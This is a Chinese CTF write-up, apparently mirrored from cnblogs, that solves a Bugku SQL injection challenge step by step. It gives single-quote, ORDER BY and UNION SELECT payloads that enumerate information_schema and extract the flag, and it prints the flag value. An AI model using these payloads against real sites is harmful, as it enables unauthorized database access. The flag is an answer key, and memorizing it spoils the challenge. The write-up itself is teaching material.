码迷,mamicode.com
首页 > 其他好文 > 详细

CTF-成绩单 90

时间:2020-06-29 00:49:03      阅读:109      评论:0      收藏:0      [点我收藏+]

标签:select   format   inject   order by   code   black   mamicode   flag   没反应   

CTF-成绩单

技术图片

点击进去看到这个就联想到了SQL注入

技术图片

用火狐的HackBar进行sql注入尝试

先输入id=1显示除了一个龙龙龙的成绩单

技术图片

再试试id=2

技术图片

判断下注入类型

and 1=1/1=2没反应 试了下单引号注入 id=2‘发现成绩单消失了确定为单引号注入

技术图片

用order by 判断多少列order by 1 #(#注释)order by 5#不能回显,order by 4#可以

所以确定列数4

技术图片

使用union查询

现将id=2‘注释掉,id=-2‘即可注释掉

输入id=-2‘ union select union 1,2,3,4#

技术图片

再输入d=-2‘ union select union 1,2,3,database()#查看数据库

技术图片

技术图片

得到数据库skctf_flag

在获取数据表输入

id=-2‘ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=‘skctf_flag‘#

获得两个数据表

技术图片

Flag应该藏在fl4g数据表里面,获取其中的列信息,输入

id=-2‘ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=‘fl4g‘#

得到一个列

技术图片

最后输入

id=-2‘ union select 1,2,3,group_concat(skctf_flag) from fl4g#

技术图片

成功获得flag BUGKU{Sql_INJECT0N_4813drd8hz4}

CTF-成绩单 90

标签:select   format   inject   order by   code   black   mamicode   flag   没反应   

原文地址:https://www.cnblogs.com/cxl862002755/p/13205558.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!